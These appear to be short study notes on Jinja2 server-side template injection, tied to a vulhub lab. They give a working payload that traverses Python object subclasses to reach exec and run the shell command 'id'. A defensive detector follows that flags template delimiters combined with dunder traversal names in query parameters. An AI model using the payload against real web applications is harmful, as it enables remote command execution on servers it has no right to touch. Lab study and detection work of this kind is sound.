SSTI
https://github.com/vulhub/vulhub/tree/master/flask/ssti
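# Find the index of the first subclass of object whose __init__ is a Python function (so it has __globals__)
GlobalsAttrCount = 0
for a in ().__class__.__base__.__subclasses__():
    if hasattr(a.__init__, '__globals__'):
        break
    GlobalsAttrCount += 1
# Reach exec through that function's globals and run a command
().__class__.__base__.__subclasses__()[GlobalsAttrCount].__init__.__globals__['__builtins__']['exec']("__import__('os').system('id')")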
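A defender-side check for the attribute chain above, added here as an example and not part of the original note or the vulhub project: it decodes query parameters (including nested percent-encoding) and flags values that combine Jinja2 delimiters with the dunder names used in the traversal. The sample request lines and the parameter names `name`, `q` and `note` are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Attribute names the traversal above walks through to reach exec.
DUNDER = re.compile(r"__(?:class|base|subclasses|init|globals|builtins|import)__")
# Jinja2 expression and statement delimiters.
DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)

# Constructed sample request lines; the parameter names are assumptions.
SAMPLE_REQUESTS = [
    "/?name=world",
    "/?q=how+to+write+__init__+in+python",
    "/?name=%7B%7B().__class__.__base__.__subclasses__()%7D%7D",
    "/?name=%257B%257B().__class__.__init__.__globals__%257D%257D",
    "/?note=__class__.__base__",
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so %257B%257B is inspected as {{."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(url):
    """Return [(param, severity, dunder_names)] for one request URL."""
    findings = []
    for param, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = fully_decode(raw)
        names = sorted(set(DUNDER.findall(value)))
        if DELIMS.search(value) and names:
            findings.append((param, "high", names))    # template syntax + traversal
        elif len(names) >= 2:
            findings.append((param, "review", names))  # traversal chain without delimiters
    return findings

def scan(requests):
    """Return [(index, param, severity)] for every flagged request."""
    return [(i, param, sev) for i, url in enumerate(requests)
            for param, sev, _ in inspect_request(url)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```

A single dunder name with no template delimiters is left unflagged, so ordinary text that mentions `__init__` does not raise an alert.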
TODO: https://github.com/vulhub/vulhub/tree/master/jira/CVE-2019-11581